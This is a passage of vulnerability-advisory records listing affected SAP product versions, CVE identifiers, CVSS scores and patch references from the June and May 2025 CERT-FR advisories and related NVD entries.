SAP | NetWeaver | NetWeaver (ABAP Keyword Documentation) versions SAP_BASIS 758
SAP | NetWeaver Visual Composer | NetWeaver Visual Composer versions VCBASE 7.50
SAP | Business One Integration Framework | Business One Integration Framework versions B1_ON_HANA 10.0 and SAP-M-BO 10.0
SAP | MDM Server | MDM Server versions 710.750
SAP | S/4HANA | S/4HANA (Manage Processing Rules - For Bank Statement) versions S4CORE 104, 105, 106, 107 and 108
SAP | SAPUI5 applications | SAPUI5 applications versions SAP_UI 750, 754, 755, 756, 757, 758 and UI_700 200
SAP | S/4HANA | S/4HANA (Manage Central Purchase Contract application) versions S4CORE 106, 107 and 108
SAP | S/4HANA | S/4HANA (Enterprise Event Enablement) versions SAP_GWFND 757 and 758
SAP | GRC | GRC (AC Plugin) versions GRCPINW V1100_700 and V1100_731
SAP | BusinessObjects Business Intelligence | BusinessObjects Business Intelligence (BI Workspace) versions ENTERPRISE 430, 2025 and 2027
SAP | S/4HANA | S/4HANA (Bank Account Application) versions S4CORE 108
SAP | NetWeaver Application Server for ABAP | NetWeaver Application Server for ABAP versions KERNEL 7.89, 7.93, 9.14 and 9.15
SAP | Business Warehouse and SAP Plug-In Basis | Business Warehouse and SAP Plug-In Basis versions PI_BASIS 2006_1_700, 701, 702, 731, 740, SAP_BW 750, 751, 752, 753, 754, 755, 756, 757, 758, 914 and 915
References
SAP security bulletin june-2025 2025-06-10 vendor-advisory


{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "Business Objects Business Intelligence Platform versions ENTERPRISE 430, 2025 et 2027",
      "product": {
        "name": "Business Objects Business Intelligence Platform",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver (ABAP Keyword Documentation) versions SAP_BASIS 758",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Visual Composer versions VCBASE 7.50",
      "product": {
        "name": "NetWeaver Visual Composer",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Business One Integration Framework versions B1_ON_HANA 10.0 et SAP-M-BO 10.0",
      "product": {
        "name": "Business One Integration Framework",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "MDM Server versions 710.750",
      "product": {
        "name": "MDM Server",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "S/4HANA (Manage Processing Rules - For Bank Statement) versions S4CORE 104, 105, 106, 107 et 108",
      "product": {
        "name": "S/4HANA",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "SAPUI5 applications versions SAP_UI 750, 754, 755, 756, 757, 758 et UI_700 200",
      "product": {
        "name": "SAPUI5 applications",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "S/4HANA (Manage Central Purchase Contract application) versions S4CORE 106, 107 et 108",
      "product": {
        "name": "S/4HANA",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "S/4HANA (Enterprise Event Enablement) versions SAP_GWFND 757 et 758",
      "product": {
        "name": "S/4HANA",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "GRC (AC Plugin) versions GRCPINW V1100_700 et V1100_731",
      "product": {
        "name": "GRC",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "BusinessObjects Business Intelligence (BI Workspace) versions ENTERPRISE 430, 2025 et 2027",
      "product": {
        "name": "BusinessObjects Business Intelligence",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "S/4HANA (Bank Account Application) versions S4CORE 108",
      "product": {
        "name": "S/4HANA",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Application Server for ABAP versions KERNEL 7.89, 7.93, 9.14 et 9.15",
      "product": {
        "name": "NetWeaver Application Server pour ABAP",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Business Warehouse et SAP Plug-In Basis versions PI_BASIS 2006_1_700, 701, 702, 731, 740, SAP_BW 750, 751, 752, 753, 754, 755, 756, 757, 758, 914 et 915",
      "product": {
        "name": "Business Warehouse et SAP Plug-In Basis",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2025-42987",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42987"
    },
    {
      "name": "CVE-2025-42991",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42991"
    },
    {
      "name": "CVE-2025-42996",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42996"
    },
    {
      "name": "CVE-2025-42988",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42988"
    },
    {
      "name": "CVE-2025-42995",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42995"
    },
    {
      "name": "CVE-2025-42984",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42984"
    },
    {
      "name": "CVE-2025-42982",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42982"
    },
    {
      "name": "CVE-2025-42993",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42993"
    },
    {
      "name": "CVE-2025-42977",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42977"
    },
    {
      "name": "CVE-2025-31325",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-31325"
    },
    {
      "name": "CVE-2025-42983",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42983"
    },
    {
      "name": "CVE-2025-42998",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42998"
    },
    {
      "name": "CVE-2025-42989",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42989"
    },
    {
      "name": "CVE-2025-42994",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42994"
    },
    {
      "name": "CVE-2025-23192",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-23192"
    },
    {
      "name": "CVE-2025-42990",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42990"
    }
  ],
  "links": [],
  "reference": "CERTFR-2025-AVI-0487",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2025-06-11T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Injection de code indirecte \u00e0 distance (XSS)"
    },
    {
      "description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
    },
    {
      "description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
    },
    {
      "description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
    },
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    },
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits SAP. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es, une atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es et une falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF).",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits SAP",
  "vendor_advisories": [
    {
      "published_at": "2025-06-10",
      "title": "Bulletin de s\u00e9curit\u00e9 SAP june-2025",
      "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news/june-2025.html"
    }
  ]
}

CERTFR-2025-AVI-0396

Vulnerability from certfr_avis - Published: - Updated:

Multiple vulnerabilities have been discovered in SAP products. Some of them allow an attacker to cause remote arbitrary code execution, a breach of data confidentiality and remote cross-site scripting (XSS).

Solutions

Refer to the vendor's security bulletin to obtain the patches (see the Documentation section).

Impacted products
Vendor Product Description
SAP S/4HANA S/4HANA HCM Portugal and SAP ERP HCM Portugal versions S4HCMCPT 100, 101, SAP_HRCPT 600, 604 and 608
SAP N/A Service Parts Management (SPM) versions SAP_APPL 600, 602, 603, 604, 605, 606, 616, 617, 618, SAPSCORE 111, S4CORE 100, 101 and 102
SAP NetWeaver NetWeaver (Visual Composer development server) version VCFRAMEWORK 7.50
SAP N/A Supplier Relationship Management (Master Data Management Catalog) version SRM_MDM_CAT 7.52
SAP Business Objects Business Intelligence Platform BusinessObjects Business Intelligence Platform versions ENTERPRISE 420, 430 and 2025
SAP N/A Business Objects Business Intelligence Platform (PMW) versions ENTERPRISE 430, 2025 and 2027
SAP NetWeaver Application Server ABAP and ABAP Platform NetWeaver Application Server ABAP and ABAP Platform versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757 and SAP_BASIS 758
SAP N/A Data Services Management Console version SBOP DS JOB SERVER 4.3
SAP N/A Digital Manufacturing (Production Operator Dashboard) version CTNR-DME-PODFOUNDATION-MS 1.0
SAP N/A Fiori for SAP ERP versions SAP_GWFND 740, 750, 751, 752, 753, 754, 755, 756, 757 and 758
SAP S/4HANA S4/HANA (OData meta-data property) versions S4CORE 102, 103, 104, 105 and 106
SAP S/4HANA S/4HANA (Private Cloud & On-Premise) versions S4CRM 204, 205, 206, S4CEXT 107, 108, BBPCRM 702, 712, 713, 714
SAP S/4HANA S/4HANA Cloud Private Edition or on Premise (SCM Master Data Layer (MDL)) versions S4CORE 102, 103, 104, 105, 106, 107, 108, SCM_BASIS 700, 701, 702, 712, 713 and 714
SAP N/A Gateway Client versions SAP_GWFND 752, 753, 754, 755, 756, 757 and 758
SAP N/A Supplier Relationship Management (Live Auction Cockpit) version SRM_SERVER 7.14
SAP N/A Service Parts Management (SPM) versions SAP_APPL 617, 618, SAPSCORE 116, S4CORE 100, 101, 102 and 103
SAP N/A PDCE versions S4CORE 102, 103, S4COREOP 104, 105, 106, 107 and 108
SAP N/A Landscape Transformation (PCL Basis) versions DMIS 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2018_1_752, 2020, S4CORE 102, 103, 104, 105, 106, 107 and 108
SAP N/A GUI for Windows version BC-FES-GUI 8.00
References
SAP security bulletin may-2025 2025-05-13 vendor-advisory


{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "S/4HANA HCM Portugal and SAP ERP HCM Portugal versions S4HCMCPT 100, 101, SAP_HRCPT 600, 604 et 608",
      "product": {
        "name": "S/4HANA",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Service Parts Management (SPM) versions SAP_APPL 600, 602, 603, 604, 605, 606, 616, 617, 618, SAPSCORE 111, S4CORE 100, 101 et 102",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver (Visual Composer development server) version VCFRAMEWORK 7.50",
      "product": {
        "name": "NetWeaver",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Supplier Relationship Management (Master Data Management Catalog) version SRM_MDM_CAT 7.52",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "BusinessObjects Business Intelligence Platform versions ENTERPRISE 420, 430 et 2025",
      "product": {
        "name": "Business Objects Business Intelligence Platform",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Business Objects Business Intelligence Platform (PMW) versions ENTERPRISE 430, 2025 et 2027",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "NetWeaver Application Server ABAP et ABAP Platform versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757 et SAP_BASIS 758",
      "product": {
        "name": "NetWeaver Application Server ABAP et ABAP Platform",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Data Services Management Console version SBOP DS JOB SERVER 4.3",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Digital Manufacturing (Production Operator Dashboard) version CTNR-DME-PODFOUNDATION-MS 1.0",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Fiori for SAP ERP versions SAP_GWFND 740, 750, 751, 752, 753, 754, 755, 756, 757 et 758",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "S4/HANA (OData meta-data property) versions S4CORE 102, 103, 104, 105 et 106",
      "product": {
        "name": "S/4HANA",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "S/4HANA (Private Cloud \u0026 On-Premise) versions S4CRM 204, 205, 206, S4CEXT 107, 108, BBPCRM 702, 712, 713, 714",
      "product": {
        "name": "S/4HANA",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "S/4HANA Cloud Private Edition or on Premise (SCM Master Data Layer (MDL)) versions S4CORE 102, 103, 104, 105, 106, 107, 108, SCM_BASIS 700, 701, 702, 712, 713 et 714",
      "product": {
        "name": "S/4HANA",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Gateway Client versions SAP_GWFND 752, 753, 754, 755, 756, 757 et 758",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Supplier Relationship Management (Live Auction Cockpit) version SRM_SERVER 7.14",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Service Parts Management (SPM) versions SAP_APPL 617, 618, SAPSCORE 116, S4CORE 100, 101, 102 et 103",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "PDCE versions S4CORE 102, 103, S4COREOP 104, 105, 106, 107 et 108",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "Landscape Transformation (PCL Basis) versions DMIS 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2018_1_752, 2020, S4CORE 102, 103, 104, 105, 106, 107 et 108",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    },
    {
      "description": "GUI for Windows version BC-FES-GUI 8.00",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "SAP",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
  "cves": [
    {
      "name": "CVE-2025-43003",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-43003"
    },
    {
      "name": "CVE-2025-43007",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-43007"
    },
    {
      "name": "CVE-2025-23191",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-23191"
    },
    {
      "name": "CVE-2025-42999",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42999"
    },
    {
      "name": "CVE-2025-43009",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-43009"
    },
    {
      "name": "CVE-2025-43011",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-43011"
    },
    {
      "name": "CVE-2025-43006",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-43006"
    },
    {
      "name": "CVE-2025-0060",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-0060"
    },
    {
      "name": "CVE-2025-30012",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30012"
    },
    {
      "name": "CVE-2025-43000",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-43000"
    },
    {
      "name": "CVE-2025-43004",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-43004"
    },
    {
      "name": "CVE-2025-31324",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-31324"
    },
    {
      "name": "CVE-2025-43005",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-43005"
    },
    {
      "name": "CVE-2025-43008",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-43008"
    },
    {
      "name": "CVE-2025-31329",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-31329"
    },
    {
      "name": "CVE-2025-30009",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30009"
    },
    {
      "name": "CVE-2025-30011",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30011"
    },
    {
      "name": "CVE-2025-43002",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-43002"
    },
    {
      "name": "CVE-2025-26662",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-26662"
    },
    {
      "name": "CVE-2025-30010",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30010"
    },
    {
      "name": "CVE-2025-42997",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-42997"
    },
    {
      "name": "CVE-2025-0061",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-0061"
    },
    {
      "name": "CVE-2025-43010",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-43010"
    },
    {
      "name": "CVE-2024-39592",
      "url": "https://www.cve.org/CVERecord?id=CVE-2024-39592"
    },
    {
      "name": "CVE-2025-30018",
      "url": "https://www.cve.org/CVERecord?id=CVE-2025-30018"
    }
  ],
  "links": [],
  "reference": "CERTFR-2025-AVI-0396",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2025-05-13T00:00:00.000000"
    },
    {
      "description": "Ajout des identifiants CVE CVE-2025-0060, CVE-2025-0061 et CVE-2025-23191",
      "revision_date": "2025-06-12T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Injection de code indirecte \u00e0 distance (XSS)"
    },
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    },
    {
      "description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
    },
    {
      "description": "Contournement de la politique de s\u00e9curit\u00e9"
    },
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits SAP. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et une injection de code indirecte \u00e0 distance (XSS).",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits SAP",
  "vendor_advisories": [
    {
      "published_at": "2025-05-13",
      "title": "Bulletin de s\u00e9curit\u00e9 SAP may-2025",
      "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news/may-2025.html"
    }
  ]
}

FKIE_CVE-2025-42968

Vulnerability from fkie_nvd - Published: 2025-07-08 01:15 - Updated: 2025-10-27 16:57
Summary
SAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module, which could grant access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application.
Impacted products

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:sap:netweaver:700:*:*:*:*:*:*:*",
              "matchCriteriaId": "A7FED49E-6F9A-494A-9226-1059249960A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:701:*:*:*:*:*:*:*",
              "matchCriteriaId": "4836C36D-242F-4818-81B4-C170959D02F5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:702:*:*:*:*:*:*:*",
              "matchCriteriaId": "6A503ABF-8655-40D7-96AD-2D7F19A673AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:710:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA008537-4D80-4126-A0D1-B209B9E56B46",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:731:*:*:*:*:*:*:*",
              "matchCriteriaId": "8A9D5C5A-6963-438B-B0EA-2A621A34D8A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:740:*:*:*:*:*:*:*",
              "matchCriteriaId": "BFFA1591-0304-4FAE-A6A7-72D04D1F41A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:750:*:*:*:*:*:*:*",
              "matchCriteriaId": "7940A9AF-308E-4CE5-BA19-7A3DCF49F644",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:751:*:*:*:*:*:*:*",
              "matchCriteriaId": "C09428E4-45BB-414D-9F3D-AA5C73D2DD5E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:752:*:*:*:*:*:*:*",
              "matchCriteriaId": "5ED0BA7D-939D-4B05-81A3-9F991C8C04F9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:753:*:*:*:*:*:*:*",
              "matchCriteriaId": "0C2BF545-A7DC-4BB6-B894-D04CF163DD88",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:754:*:*:*:*:*:*:*",
              "matchCriteriaId": "A75B2F18-60BE-41B5-82CB-520F794F2004",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:755:*:*:*:*:*:*:*",
              "matchCriteriaId": "E31620E5-30FC-4545-A430-AAA77A66B51A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:756:*:*:*:*:*:*:*",
              "matchCriteriaId": "9724E131-9893-4630-96A2-EB6032D98C58",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:757:*:*:*:*:*:*:*",
              "matchCriteriaId": "8FEBCDDF-4828-45D1-A81D-FFB50261DBCA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:758:*:*:*:*:*:*:*",
              "matchCriteriaId": "8FB60751-D53F-496C-AB5B-922561FB27D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:816:*:*:*:*:*:*:*",
              "matchCriteriaId": "4E4042A5-8859-44E6-9CA0-AA8A09D081A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:914:*:*:*:*:*:*:*",
              "matchCriteriaId": "0018F635-E38F-47AB-9AC3-CA2BBE6D5FA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:sap:netweaver:916:*:*:*:*:*:*:*",
              "matchCriteriaId": "52996086-B7EA-40CB-B6F3-983C11329FF2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module which could grants access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application."
    },
    {
      "lang": "es",
      "value": "SAP NetWeaver permite que un usuario no administrativo autenticado acceda al m\u00f3dulo de funci\u00f3n remota, lo que le otorga acceso a informaci\u00f3n no confidencial sobre el sistema SAP y el sistema operativo sin necesidad de conocimientos espec\u00edficos ni condiciones controladas. Esto reduce el impacto en la confidencialidad y no afecta la integridad ni la disponibilidad de la aplicaci\u00f3n."
    }
  ],
  "id": "CVE-2025-42968",
  "lastModified": "2025-10-27T16:57:45.097",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 1.4,
        "source": "cna@sap.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "NONE",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 1.4,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2025-07-08T01:15:23.950",
  "references": [
    {
      "source": "cna@sap.com",
      "tags": [
        "Permissions Required"
      ],
      "url": "https://me.sap.com/notes/3621037"
    },
    {
      "source": "cna@sap.com",
      "tags": [
        "Patch"
      ],
      "url": "https://url.sap/sapsecuritypatchday"
    }
  ],
  "sourceIdentifier": "cna@sap.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-862"
        }
      ],
      "source": "cna@sap.com",
      "type": "Primary"
    }
  ]
}

FKIE_CVE-2025-42999

Vulnerability from fkie_nvd - Published: 2025-05-13 01:15 - Updated: 2025-10-31 21:58
Summary
SAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system.
Impacted products
Vendor Product Version
sap netweaver 7.5

{
  "cisaActionDue": "2025-06-05",
  "cisaExploitAdd": "2025-05-15",
  "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
  "cisaVulnerabilityName": "SAP NetWeaver Deserialization Vulnerability",
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:sap:netweaver:7.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "74F7C92A-48F7-456A-BDFF-91A482DE8546",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "SAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system."
    },
    {
      "lang": "es",
      "value": "SAP NetWeaver Visual Composer Metadata Uploader es vulnerable cuando un usuario privilegiado puede cargar contenido malicioso o no confiable que, al deserializarse, podr\u00eda comprometer la confidencialidad, integridad y disponibilidad del sistema host."
    }
  ],
  "id": "CVE-2025-42999",
  "lastModified": "2025-10-31T21:58:56.343",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.1,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 6.0,
        "source": "cna@sap.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-05-13T01:15:48.440",
  "references": [
    {
      "source": "cna@sap.com",
      "tags": [
        "Permissions Required"
      ],
      "url": "https://me.sap.com/notes/3604119"
    },
    {
      "source": "cna@sap.com",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://url.sap/sapsecuritypatchday"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "US Government Resource"
      ],
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-42999"
    }
  ],
  "sourceIdentifier": "cna@sap.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-502"
        }
      ],
      "source": "cna@sap.com",
      "type": "Secondary"
    }
  ]
}

FKIE_CVE-2025-31324

Vulnerability from fkie_nvd - Published: 2025-04-24 17:15 - Updated: 2025-10-31 21:56
Summary
SAP NetWeaver Visual Composer Metadata Uploader is not protected with proper authorization, allowing an unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
Impacted products
Vendor Product Version
sap netweaver 7.50

{
  "cisaActionDue": "2025-05-20",
  "cisaExploitAdd": "2025-04-29",
